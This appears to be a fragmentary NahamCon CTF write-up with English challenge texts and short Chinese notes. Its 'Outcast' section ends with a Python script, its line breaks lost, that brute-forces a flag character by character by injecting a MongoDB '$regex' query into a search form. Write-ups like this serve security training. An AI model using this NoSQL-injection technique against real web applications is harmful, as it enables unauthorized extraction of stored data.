Oh shoot! I accidentally took a screenshot just as I accidentally opened the dump of a flag.zip file in a text editor! Whoopsies, what a crazy accidental accident that just accidented!
Well anyway, I think I remember the password was just password!
NOTE, bruteforcing flag submissions is still not permitted. I will put a “max attempts” limit on this challenge at 1:00 PM Pacific to stop participants from automating submissions. There is only one correct flag, you can find a needle in a haystack if you really know what you are looking for.
下载附件,得到一堆flag,但其中只有一个是正确的
正则匹配
Web
Outcast
Author: YesWeHack
YesWeHack has provided this CTF challenge, and they state: “This challenge is meant to be run as a black-box environment. The source code is intentionally not provided.”
***Light* enumeration is permitted for this challenge.
**NOTE, the flag for this challenge is not in the standard flag format. The format of the flag is with a flag{} wrapper but with _l33tsp3@k!_ inside the curly braces.
Special thanks to YesWeHack for the sponsorship and support of the NahamCon CTF!
**Press the Start button on the top-right to begin this challenge.****
whilenot flag.endswith("}"): for c in charset: try_str = flag + c searchQuery = f'flag: {{"$regex":"^{try_str}"}}' data = { "query": searchQuery, "collection": "flags" } print(f"[->] Trying: {try_str}") res = requests.post(url,data=data) if"Pattern matched"in res.text: flag += c print(f"{try_str}") break print(f"[√]最终的flag: {flag}")